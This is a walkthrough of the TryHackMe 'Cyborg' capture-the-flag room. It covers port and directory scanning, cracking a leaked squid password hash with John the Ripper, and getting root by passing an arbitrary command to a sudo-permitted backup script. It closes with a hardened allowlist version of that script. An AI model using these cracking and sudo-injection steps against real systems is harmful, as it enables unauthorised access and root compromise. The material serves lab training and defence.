TryHackMe - Cyborg
Let's do Cyborg on TryHackMe
Open Ports
$ nmap -sV -sC --open -Pn $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-09 01:57 EDT
Nmap scan report for 10.10.238.68
Host is up (0.18s latency).
Not shown: 704 closed tcp ports (conn-refused), 294 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web
Discover any easy information on the web server with gobuster.
$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://$IP
/admin
Poking around, we see some chatter that gives away what else to look for:
Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier.
I decided to give up like i always do ahahaha sorry about that.
I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process.
Might pass it over to the IT guys but in the meantime all the config files are laying about.
And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol.
other than that im pretty sure my backup "music_archive" is safe just to confirm.
Download the music archive, archive.tar
/etc/squid/{passwd, squid.conf}
Download the passwd file and crack it with john the ripper:
$ john -wordlist:/usr/share/wordlists/rockyou.txt ./passwd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
******** (music_archive)
1g 0:00:00:00 DONE (2022-10-09 02:04) 2.000g/s 77952p/s 77952c/s 77952C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Use the cracked password with borg to extract the downloaded archive:
$ cat Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
****:**********
Initial Access - SSH
Now we can SSH to the server as alex with the found password.
alex@ubuntu:~$ cat user.txt
flag{*********************************}
Privilege Escalation
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
The backup script can be executed via sudo, and looking at it, we see it has the option to run some command:
while getopts c: flag
do
    case "${flag}" in
        c) command=${OPTARG};;
    esac
done
This means we can pass an arbitrary command with the -c option, which the script executes towards the end, and since we're running the script with sudo, that command runs as root.
$ sudo /etc/mp3backups/backup.sh -c "cat /root/root.txt"
flag{***********************************}
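A defender's fix for the option-parsing pattern shown above, as an added example that is not the room's own backup.sh: the -c value is checked against a fixed allowlist (the list and the parse_backup_opts name are assumptions), so a NOPASSWD sudo rule on the script no longer hands out arbitrary command execution as root.

```shell
#!/bin/sh
# Added example, not the room's backup.sh: a hardened version of the
# "while getopts c: flag" loop. Instead of executing whatever string
# arrives via -c, the script only accepts names from an allowlist and
# maps them to fixed actions itself.

# Hypothetical allowlist of sub-commands the script is willing to run.
ALLOWED_COMMANDS="list verify"

# parse_backup_opts "$@"
# Prints the chosen sub-command and returns 0 when the -c value is on
# the allowlist; prints nothing and returns 1 for anything else
# (missing -c, unknown option, or an arbitrary command string).
parse_backup_opts() {
    command=""
    OPTIND=1
    while getopts c: flag "$@"; do
        case "${flag}" in
            c) command="${OPTARG}" ;;
            *) return 1 ;;
        esac
    done
    for allowed in $ALLOWED_COMMANDS; do
        if [ "$command" = "$allowed" ]; then
            printf '%s\n' "$command"
            return 0
        fi
    done
    return 1
}

# Stand-alone run: dispatch only on a validated name, never on raw input.
if [ "${0##*/}" = "backup.sh" ]; then
    action="$(parse_backup_opts "$@")" || { echo "refused" >&2; exit 1; }
    case "$action" in
        list)   echo "would list backups" ;;
        verify) echo "would verify backups" ;;
    esac
fi
```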